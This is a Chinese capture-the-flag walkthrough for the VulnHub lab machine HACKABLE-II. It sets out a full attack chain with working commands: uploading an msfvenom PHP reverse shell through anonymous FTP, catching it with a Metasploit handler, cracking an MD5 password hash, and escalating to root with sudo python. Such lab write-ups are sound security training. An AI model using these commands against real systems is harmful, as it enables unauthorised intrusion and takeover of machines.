『vulnhub系列』HACKABLE-II
下载地点:
- https://www.vulnhub.com/entry/hackable-ii,711/
复制代码 信息搜集:
利用nmap探测存活主机,发现主机开启了21,22和80端口
访问80端口的web服务,发现apache默认页面
利用dirsearch举行目录爆破,发现files 目录- dirsearch -u "http://192.168.199.135/"
复制代码
访问files 页面发现CALL.html
访问CALL.html发现只有一段话
这条路的线索临时断了,我们利用匿名登录ftp,发现CALL.html- ftp 192.168.199.135
- #使用anonymous登录,密码为空
复制代码
get之后发现就是我们刚刚在files中发现的CALL.html
毛病利用:
此时我们上传反弹shell(利用msfvenom天生)- msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.199.129 lport=4444 -o re_shell.php
- #生成反弹shell
- put re_shell.php
- #上传反弹shell
复制代码
进入files文件,发现我们刚刚上传的re_shell.php
我们利用msfconsole举行监听- msfconsole
- use exploit/multi/handler
- set lhost 192.168.199.129
- set payload php/meterpreter/reverse_tcp
- run
复制代码
开启监听后,访问re_shell.php ,反弹乐成
进入shell,利用python开启交互式shell- python3 -c "import pty;pty.spawn('/bin/bash')"
复制代码 提升权限:
我们在/home中发现了important.txt ,读取发现“运行脚本发现数据”
读取/.runme.sh 发现secret key trolled 还有下面的shrek:cf4c2232354952690368f1b3dfdfb24d
利用md5解密得到密码onion
切换sherk,利用密码onion,登陆乐成
获得user.txt
利用sudo -l 查看当前用户可以以root权限执行的命令,发现python命令可以以root权限提权
此时我们利用python 举行提权,乐成- sudo python3.5 -c 'import os;os.system("/bin/bash");'
复制代码
得到root.txt
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |